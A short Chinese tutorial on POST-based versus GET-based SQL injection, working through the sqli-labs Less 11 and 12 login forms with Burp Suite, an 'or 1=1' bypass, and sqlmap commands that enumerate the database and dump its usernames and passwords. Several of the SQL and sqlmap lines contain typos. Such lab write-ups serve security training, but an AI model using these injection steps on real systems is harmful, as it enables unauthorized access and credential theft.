get注入与post注入区别
get注入可以直接在URL上进行传输参数。
post注入是基于输入框进行注入,所以得使用辅助工具进行注入。
post注入的两个前提:
1.输入框可以交互
2.输入的语句会进入到数据库进行信息查找
下面我们用sqli-lab less11来举一个例子
less11
首先我们使用brupsuite进行信息拦截。这里我们得到了发给web的http请求。我们把这条信息发送到repeater上进行注入。
我们可以先对sql语句进行判断。
select uname,passwd form tables where ‘uname’ and ‘psaawd’ limit 0,1
我们注入一个万能密码,or 1=1
可以看到已经进入数据库
当然我们可以注入其他语句,进行数据库查询等等。
less12
less12就是一个双引号加括号闭合,注入方法与less11一样,就不再多说。
我们接下来用sqlmap进行探测。
sqlmap
1.首先我们先进行数据库探测
sqlmap -r target.txt --current-db --technique E --batch
2.得到目前正在使用的数据库名,查看此数据库表名。
sqlmap -r target.txt -D security --tables --technique E --batch
3.得到数据表之后我们对感兴趣的数据进行字段收集
sqlmap -r target.txt -D security -T --cloumns --technique E --batch
4.进行用户名和密码探查
sqlmap -r target.txt -D security -T users -C ‘username,psaaword’ --dump --technique E --batch